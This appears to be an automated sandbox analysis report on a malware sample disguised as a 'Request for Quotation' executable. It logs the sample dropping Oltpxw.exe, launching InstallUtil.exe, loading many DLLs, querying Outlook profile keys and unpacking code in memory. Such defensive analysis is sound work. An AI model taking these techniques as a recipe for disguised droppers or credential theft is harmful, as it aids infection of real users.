                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: Request for Quotation-537262227-04.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Request for Quotation-537262227-04.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Request for Quotation-537262227-04.exe, 00000000.00000002.2156575448.000000000298A000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2177410373.0000000006430000.00000004.08000000.00040000.00000000.sdmp, Oltpxw.exe, 00000004.00000002.2322212414.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, Oltpxw.exe, 00000006.00000002.2426055475.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Request for Quotation-537262227-04.exe, 00000000.00000002.2156575448.000000000298A000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2177410373.0000000006430000.00000004.08000000.00040000.00000000.sdmp, Oltpxw.exe, 00000004.00000002.2322212414.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, Oltpxw.exe, 00000006.00000002.2426055475.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.00000000039C6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2176585974.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.0000000003A76000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.00000000039C6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2176585974.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.0000000003A76000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: Request for Quotation-537262227-04.exe, Operator.cs.Net Code: DoImplicitConversion
                    Source: Request for Quotation-537262227-04.exe, Ahvnljyketq.cs.Net Code: Pygxiltn System.AppDomain.Load(byte[])
                    Source: Oltpxw.exe.0.dr, Operator.cs.Net Code: DoImplicitConversion
                    Source: Oltpxw.exe.0.dr, Ahvnljyketq.cs.Net Code: Pygxiltn System.AppDomain.Load(byte[])
                    Source: 0.2.Request for Quotation-537262227-04.exe.6430000.11.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.Request for Quotation-537262227-04.exe.6430000.11.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.Request for Quotation-537262227-04.exe.6430000.11.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: 0.2.Request for Quotation-537262227-04.exe.3b68830.6.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.Request for Quotation-537262227-04.exe.3b68830.6.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.Request for Quotation-537262227-04.exe.3b68830.6.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.Request for Quotation-537262227-04.exe.3b68830.6.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.Request for Quotation-537262227-04.exe.3b68830.6.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: 0.2.Request for Quotation-537262227-04.exe.3a26f90.1.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.Request for Quotation-537262227-04.exe.3a26f90.1.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.Request for Quotation-537262227-04.exe.3a26f90.1.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.Request for Quotation-537262227-04.exe.3a26f90.1.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.Request for Quotation-537262227-04.exe.3a26f90.1.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
